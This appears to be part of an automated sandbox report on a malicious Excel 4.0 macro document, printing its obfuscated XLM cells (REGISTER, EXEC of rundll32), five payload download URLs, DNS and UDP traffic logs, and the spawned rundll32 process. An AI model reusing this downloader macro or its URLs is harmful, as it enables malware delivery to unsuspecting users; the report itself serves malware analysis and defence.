                                                                                                                                                      ,,,,,,,,,,,,=B154(),"=FORMULA.FILL(Mols!U54&Mols!U55&Mols!U56&Mols!U57&Mols!U58&Mols!U59,BB53)","=FORMULA.FILL(Mols!AC56,HI18807)","=EXEC(""r""&Mols!AC60&"" ""&Mols!AC59&HG9961)",=B156(),=C156(),=HALT(),"=FORMULA.FILL(Mols!V53&Mols!V54&Mols!V55&Mols!V56&Mols!V57&Mols!V58&Mols!V59&Mols!V60&Mols!V61&Mols!V62&Mols!V63&Mols!V64&Mols!V65&Mols!V66&Mols!V67&Mols!V68&Mols!V69&Mols!V70,HZ48004)","=FORMULA.FILL(Mols!AC57,AN32726)",,=B158(),=C158(),"=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)","=FORMULA.FILL(Mols!U62&Mols!U63&Mols!U64&Mols!U65&Mols!U66&Mols!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)","=Niokaser(0,GT17028,AQ4875,0,0)",=B160(),=C160(),,"=FORMULA.FILL(Mols!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)",=B162(),=C162(),"=Vuolasd(GT17028,AQ4875,1)","=FORMULA.FILL(Mols!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(Mols!AC60,AS41071)",=A158(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(Mols!AC61,HG9961)",,,=C154(),,,,,,,,,"=INDEX(D171:D175,RANDBETWEEN(1,5))",,,,,,,,www.webdevelopmentinlahore.com/whoqvn/5555555555.jpg,,,digital-box.fr/hjmrcv/5555555555.jpg,,,bbpqtf.com/qextstpcuumf/5555555555.jpg,,,rishtee.com/zbpxyo/5555555555.jpg,,,leafybuy.com/norzygt/5555555555.jpg

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 22, 2021 11:18:44.126029968 CET5598453192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:44.176923037 CET53559848.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:45.059998035 CET6418553192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:45.116636992 CET53641858.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:46.005888939 CET6511053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:46.057089090 CET53651108.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:47.938009977 CET5836153192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:47.985980034 CET53583618.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:54.915770054 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:54.966728926 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:56.042081118 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:56.101699114 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:56.599828959 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:56.660315990 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:57.605480909 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:57.677603960 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:58.622731924 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:58.681610107 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:58.866959095 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:58.914959908 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:59.279544115 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:59.660343885 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:18:59.689553976 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:18:59.958020926 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:00.124672890 CET4956353192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:00.180973053 CET53495638.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:00.637095928 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:00.696186066 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:01.144889116 CET5135253192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:01.192786932 CET53513528.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:02.330770969 CET5934953192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:02.387371063 CET53593498.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:03.480076075 CET5708453192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:03.528166056 CET53570848.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:04.445410967 CET5882353192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:04.493195057 CET53588238.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:04.641845942 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:04.700823069 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:06.961056948 CET5756853192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:07.019844055 CET53575688.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:07.225059032 CET5054053192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:07.275907993 CET53505408.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:08.425071001 CET5436653192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:08.481858015 CET53543668.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:09.277237892 CET5303453192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:09.325215101 CET53530348.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:13.662147999 CET5776253192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:13.710149050 CET53577628.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:26.571655035 CET5543553192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:26.629343033 CET53554358.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:34.079920053 CET5071353192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:34.139143944 CET53507138.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:36.508429050 CET5613253192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:36.577780962 CET53561328.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:50.560648918 CET5898753192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:50.608686924 CET53589878.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:19:54.989357948 CET5657953192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:19:55.045957088 CET53565798.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:20:25.483525038 CET6063353192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:20:25.531593084 CET53606338.8.8.8192.168.2.3
                                                                                                                                                      Jan 22, 2021 11:20:27.688492060 CET6129253192.168.2.38.8.8.8
                                                                                                                                                      Jan 22, 2021 11:20:27.747167110 CET53612928.8.8.8192.168.2.3

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Jan 22, 2021 11:18:59.279544115 CET192.168.2.38.8.8.80x833bStandard query (0)leafybuy.comA (IP address)IN (0x0001)
                                                                                                                                                      Jan 22, 2021 11:18:59.689553976 CET192.168.2.38.8.8.80x442fStandard query (0)leafybuy.comA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Jan 22, 2021 11:18:59.660343885 CET8.8.8.8192.168.2.30x833bServer failure (2)leafybuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                      Jan 22, 2021 11:18:59.958020926 CET8.8.8.8192.168.2.30x442fServer failure (2)leafybuy.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:11:18:54
                                                                                                                                                      Start date:22/01/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0xf40000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:11:18:59
                                                                                                                                                      Start date:22/01/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
                                                                                                                                                      Imagebase:0x8c0000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >